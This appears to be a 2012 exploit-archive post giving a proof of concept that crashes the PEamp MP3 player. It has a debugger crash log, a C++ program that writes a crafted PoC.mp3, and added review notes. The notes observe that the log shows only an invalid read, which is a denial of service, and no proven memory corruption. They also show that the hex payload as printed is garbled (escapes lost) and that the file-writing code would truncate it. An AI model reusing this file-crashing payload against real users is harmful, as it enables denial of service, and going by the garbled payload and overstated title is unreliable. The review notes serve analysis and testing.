Home / exploits PEamp Memory Corruption
Posted on 12 June 2012
/*
Title: PEamp (.mp3) Memory Corruption PoC
Author: Ayrbyte
Link: http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/mp3player.shtml
Version: v1.02b
Tested on: Windows 7
Fb: facebook.com/Ayrbyte
Greetz To : all CREMY Family, and for all indonesian h4x0r
______________>>Ayrbyte<<_______________
Gamerz From CREMY | CRazy Experience arMY

[bug]
eax=00040446 ebx=00000000 ecx=7324945c edx=00000000 esi=00040446 edi=00040446
eip=7322428e esp=0012fc4c ebp=0012fc4c iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\WINMM.dll -
WINMM!DriverCallback+0x7bf:
7322428e 8b40d4          mov     eax,dword ptr [eax-2Ch] ds:0023:0004041a=????????  <--CRASH

NOTE(review): what the log above establishes, and what it does not.
  - The faulting instruction is a 4-byte READ from [eax-2Ch]; with
    eax=00040446 that is 0004041a, which the debugger shows as unreadable
    (????????). The fault is inside WINMM.dll, not in PEamp's own module.
  - Only export symbols were loaded, so "DriverCallback+0x7bf" is the nearest
    exported name, not necessarily the function that actually faulted.
  - Nothing in this log shows a write or control of eip. On this evidence the
    issue is a crash (denial of service); the title's "memory corruption" is
    not demonstrated here.
*/

//[Poc :]
// NOTE(review): the code below uses FILE, fopen, fputs and fclose, which are
// declared in <cstdio>; only <iostream> is included, so the build relies on a
// transitive include. Nothing from namespace std is named explicitly.
#include <iostream>
using namespace std;

// Add PoC.mp3 to PEamp and play it: an MCI error message box appears, and the
// program crashes when you click OK or close that message box.

// File contents ("isi" is Indonesian for "contents").
// NOTE(review): as printed on this page the literal holds plain text such as
// "x49x44x33", not bytes. The backslashes of what were presumably hex escapes
// appear to have been lost in extraction, as they were in the DLL path of the
// crash log. Read as hex, the data would start with 49 44 33 03 ("ID3", 0x03)
// and would contain an FF FB frame sync and a trailing "TAG" block, i.e. it
// looks like a small MP3 with ID3 tags -- confirm against the original post.
// NOTE(review): an identifier that begins with an underscore is reserved at
// global scope in C++.
char _isi[] =
"x49x44x33x03x00x00x00x21x76x43x4Fx4Dx4Dx00x00x00"
"x00x22x00x00x00x65x6Ex67x00x4Dx41x44x45x20x42x59"
"x20x3Ax20x53x20x41x20x50x20x49x20x50x72x6Fx64x75"
"x63x74x69x6Fx6Ex73x54x52x43x4Bx00x00x00x02x00x00"
"x00x36x54x43x4Fx4Ex00x00x00x05x00x00x00x28x31x37"
"x29x54x41x4Cx42x00x00x00x0Dx00x00x00x43x49x54x59"
"x20x4Fx46x20x45x56x49x4Cx54x49x54x32x00x00x00x11"
"x00x00x00x30x36x20x53x65x69x7Ax65x20x54x68x65x20"
"x44x61x79x50x52x49x56x00x00x00x27x00x00x57x4Dx2F"
"x4Dx65x64x69x61x43x6Cx61x73x73x50x72x69x6Dx61x72"
"x79x49x44x00xBCx7Dx60xD1x23xE3xE2x4Bx86xA1x48xA4"
"x2Ax28x44x1Ex50x52x49x56x00x00x00x29x00x00x57x4D"
"x2Fx4Dx65x64x69x61x43x6Cx61x73x73x53x65x63x6Fx6E"
"x64x61x72x79x49x44x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x54x50x45x31x00x00x00x12x00"
"x00x00x41x56x45x4Ex47x45x44x20x53x45x56x45x4Ex46"
"x4Fx4Cx44x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00xFFxFBx92x44xFFx80x0BxF0x00x4Bx80x00x00"
"x08x00x00x09x70x00x00x01x00x00x01x2Ex00x00x00x20"
"x00x00x25xC0x00x00x04x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x54x41x47x30x36x20x53x65x69x7Ax65"
"x20x54x68x65x20x44x61x79x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x41x56x45x4Ex47x45x44x20x53x45"
"x56x45x4Ex46x4Fx4Cx44x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x43x49x54x59x20x4Fx46x20x45x56x49x4C"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x4Dx41x44x45x20x42x59x20x3Ax20"
"x53x20x41x20x50x20x49x20x50x72x6Fx64x75x63x74x69"
"x6Fx6Ex00x06x11";

// Writes _isi to "PoC.mp3" in the current working directory and returns 0.
int main(){
    FILE *_file;
    // The macro is defined inside main but, like every #define, stays visible
    // to the end of the translation unit.
#define _namefile "PoC.mp3"
    // NOTE(review): mode "w" is text mode; on Windows the C runtime rewrites
    // every 0x0A byte as 0x0D 0x0A, so binary data should be opened with "wb".
    // The result is not checked: if the file cannot be created, fputs and
    // fclose receive a null pointer.
    _file = fopen(_namefile, "w");
    // NOTE(review): fputs stops at the first NUL byte. If the literal is hex
    // escapes, its fifth byte is 00, so only the four bytes before it reach
    // the file. Anyone building a regression test or a file signature from
    // this report should check which file actually triggered the logged crash.
    fputs(_isi, _file);
    fclose(_file);
    return 0;
}
